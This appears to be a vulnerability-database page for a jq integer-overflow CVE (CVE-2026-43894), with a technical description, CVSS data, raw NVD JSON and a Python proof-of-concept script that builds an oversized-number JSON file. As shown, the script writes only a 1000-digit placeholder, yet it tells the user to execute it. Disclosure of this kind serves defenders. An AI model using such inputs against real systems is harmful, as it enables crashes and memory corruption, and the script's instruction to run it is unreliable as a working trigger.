Security Vulnerability Report
中文
CVE-2026-43894 CVSS 6.2 MEDIUM

CVE-2026-43894

Published: 2026-05-11 18:16:37
Last Modified: 2026-05-11 20:25:46
Source: [email protected]

Description

jq is a command-line JSON processor. In 1.8.1 and earlier, when decNumberFromString is given a number literal of INT_MAX-1 (2147483646) digits, the D2U() macro overflows during signed-int arithmetic. The wrapped negative value bypasses the heap-allocation size check, causes the function to use a 30-byte stack buffer, and then writes ≈715 million 16-bit units (≈1.4 GiB) at an offset 1.43 GiB below the stack frame. The written content is fully attacker-controlled (the parsed decimal digits, packed 3-per-unit).

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

jq <= 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Generator for CVE-2026-43894 # This script generates a JSON file with a huge number to trigger the overflow. # WARNING: Generating a file with 2147483646 digits requires ~2GB disk space. import sys def generate_malicious_json(filename, digit_count=2147483646): print(f"Generating JSON with {digit_count} digits...") # Creating a number string. '9' repeated digit_count times. # Note: This will consume significant memory and disk space. try: # For safety in this example, we don't actually allocate the full string in memory # unless explicitly intended, but the logic is as follows. # number_str = '9' * digit_count # payload = '{"huge_number": ' + number_str + '}' # Writing directly to file to handle large size with open(filename, 'w') as f: f.write('{"huge_number": ') # In a real scenario, write '9' * digit_count here # f.write('9' * digit_count) f.write('9' * 1000) # Placeholder for demonstration f.write('}') print(f"Payload saved to {filename}") print(f"Execute: jq . {filename}") except MemoryError: print("Error: Not enough memory to generate the full payload.") if __name__ == "__main__": generate_malicious_json("poc_cve_2026_43894.json")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43894", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:37.250", "lastModified": "2026-05-11T20:25:45.993", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "jq is a command-line JSON processor. In 1.8.1 and earlier, when decNumberFromString is given a number literal of INT_MAX-1 (2147483646) digits, the D2U() macro overflows during signed-int arithmetic. The wrapped negative value bypasses the heap-allocation size check, causes the function to use a 30-byte stack buffer, and then writes ≈715 million 16-bit units (≈1.4 GiB) at an offset 1.43 GiB below the stack frame. The written content is fully attacker-controlled (the parsed decimal digits, packed 3-per-unit)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/jqlang/jq/security/advisories/GHSA-5v7p-2r57-2g4g", "source": "[email protected]"}, {"url": "https://github.com/jqlang/jq/security/advisories/GHSA-5v7p-2r57-2g4g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.